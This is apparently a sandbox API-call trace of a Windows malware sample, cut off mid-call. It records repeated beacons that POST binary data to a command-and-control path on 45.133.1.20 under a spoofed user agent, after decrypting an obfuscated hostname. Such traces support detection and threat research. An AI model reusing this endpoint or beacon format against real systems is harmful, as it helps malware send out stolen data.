[0310.430] GetProcessHeap () returned 0x6a0000 [0310.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0310.431] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.431] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.431] GetProcessHeap () returned 0x6a0000 [0310.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0310.432] GetProcessHeap () returned 0x6a0000 [0310.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.432] send (s=0xbcc, buf=0x6bd460*, len=242, flags=0) returned 242 [0310.434] send (s=0xbcc, buf=0x6bb998*, len=159, flags=0) returned 159 [0310.434] GetProcessHeap () returned 0x6a0000 [0310.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0310.434] recv (in: s=0xbcc, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0310.509] GetProcessHeap () returned 0x6a0000 [0310.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0310.509] GetProcessHeap () returned 0x6a0000 [0310.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0310.510] GetProcessHeap () returned 0x6a0000 [0310.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df3e8 | out: hHeap=0x6a0000) returned 1 [0310.510] GetProcessHeap () returned 0x6a0000 [0310.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0310.511] closesocket (s=0xbcc) returned 0 [0310.511] GetProcessHeap () returned 0x6a0000 [0310.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0310.512] GetProcessHeap () returned 0x6a0000 [0310.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.512] GetProcessHeap () returned 0x6a0000 [0310.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0310.513] GetProcessHeap () returned 0x6a0000 [0310.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0310.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x190c) returned 0xbcc [0310.515] Sleep (dwMilliseconds=0xea60) [0310.517] GetProcessHeap () returned 0x6a0000 [0310.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0310.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0310.570] GetProcessHeap () returned 0x6a0000 [0310.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0310.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.589] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0310.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.590] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.592] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.592] GetProcessHeap () returned 0x6a0000 [0310.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0310.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.594] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0310.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.598] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0310.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.599] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0310.599] GetProcessHeap () returned 0x6a0000 [0310.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.601] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.602] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.603] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.604] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.605] GetProcessHeap () returned 0x6a0000 [0310.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0310.605] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.605] GetProcessHeap () returned 0x6a0000 [0310.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0310.606] GetProcessHeap () returned 0x6a0000 [0310.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.606] GetProcessHeap () returned 0x6a0000 [0310.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0310.607] GetProcessHeap () returned 0x6a0000 [0310.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0310.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.608] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0310.627] GetProcessHeap () returned 0x6a0000 [0310.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0310.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.636] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0310.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.637] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.638] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.638] GetProcessHeap () returned 0x6a0000 [0310.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0310.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.640] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0310.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.645] CryptDestroyKey (hKey=0x6ad020) returned 1 [0310.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.646] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0310.646] GetProcessHeap () returned 0x6a0000 [0310.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.648] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0310.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.649] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0310.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0310.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0310.652] GetProcessHeap () returned 0x6a0000 [0310.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0310.652] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0310.652] GetProcessHeap () returned 0x6a0000 [0310.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0310.653] socket (af=2, type=1, protocol=6) returned 0xbd0 [0310.655] connect (s=0xbd0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0310.696] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0310.696] GetProcessHeap () returned 0x6a0000 [0310.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0310.696] GetProcessHeap () returned 0x6a0000 [0310.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0310.697] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.698] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.698] GetProcessHeap () returned 0x6a0000 [0310.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0310.698] GetProcessHeap () returned 0x6a0000 [0310.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.698] GetProcessHeap () returned 0x6a0000 [0310.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0310.698] GetProcessHeap () returned 0x6a0000 [0310.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0310.699] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0310.700] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.700] GetProcessHeap () returned 0x6a0000 [0310.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0310.700] GetProcessHeap () returned 0x6a0000 [0310.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0310.701] send (s=0xbd0, buf=0x6bd460*, len=242, flags=0) returned 242 [0310.703] send (s=0xbd0, buf=0x6bb998*, len=159, flags=0) returned 159 [0310.703] GetProcessHeap () returned 0x6a0000 [0310.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0310.703] recv (in: s=0xbd0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0310.847] GetProcessHeap () returned 0x6a0000 [0310.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0310.848] GetProcessHeap () returned 0x6a0000 [0310.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0310.849] GetProcessHeap () returned 0x6a0000 [0310.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0310.849] GetProcessHeap () returned 0x6a0000 [0310.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0310.850] closesocket (s=0xbd0) returned 0 [0310.860] GetProcessHeap () returned 0x6a0000 [0310.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0310.861] GetProcessHeap () returned 0x6a0000 [0310.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.861] GetProcessHeap () returned 0x6a0000 [0310.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0310.862] GetProcessHeap () returned 0x6a0000 [0310.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0310.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1910) returned 0xbd0 [0310.865] Sleep (dwMilliseconds=0xea60) [0310.874] GetProcessHeap () returned 0x6a0000 [0310.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0310.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.875] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.890] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0310.957] GetProcessHeap () returned 0x6a0000 [0310.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0310.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.958] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0310.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.959] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.960] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.960] GetProcessHeap () returned 0x6a0000 [0310.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0310.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.962] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0310.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.963] CryptDestroyKey (hKey=0x6ad020) returned 1 [0310.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.965] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0310.965] GetProcessHeap () returned 0x6a0000 [0310.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0310.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.966] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.967] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.969] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0310.970] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.970] GetProcessHeap () returned 0x6a0000 [0310.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0310.970] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.971] GetProcessHeap () returned 0x6a0000 [0310.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0310.971] GetProcessHeap () returned 0x6a0000 [0310.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0310.972] GetProcessHeap () returned 0x6a0000 [0310.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0310.972] GetProcessHeap () returned 0x6a0000 [0310.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0310.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0310.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0311.024] GetProcessHeap () returned 0x6a0000 [0311.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0311.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.025] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0311.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.026] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.028] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.028] GetProcessHeap () returned 0x6a0000 [0311.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0311.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.030] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0311.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.035] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0311.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.037] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0311.037] GetProcessHeap () returned 0x6a0000 [0311.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.038] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0311.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0311.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0311.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0311.042] GetProcessHeap () returned 0x6a0000 [0311.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0311.042] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0311.042] GetProcessHeap () returned 0x6a0000 [0311.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0311.042] socket (af=2, type=1, protocol=6) returned 0xbd4 [0311.043] connect (s=0xbd4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0311.071] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0311.072] GetProcessHeap () returned 0x6a0000 [0311.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0311.072] GetProcessHeap () returned 0x6a0000 [0311.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0311.073] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.074] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.074] GetProcessHeap () returned 0x6a0000 [0311.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df628 [0311.074] GetProcessHeap () returned 0x6a0000 [0311.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.075] GetProcessHeap () returned 0x6a0000 [0311.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0311.075] GetProcessHeap () returned 0x6a0000 [0311.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0311.076] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.077] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.077] GetProcessHeap () returned 0x6a0000 [0311.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0311.077] GetProcessHeap () returned 0x6a0000 [0311.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: 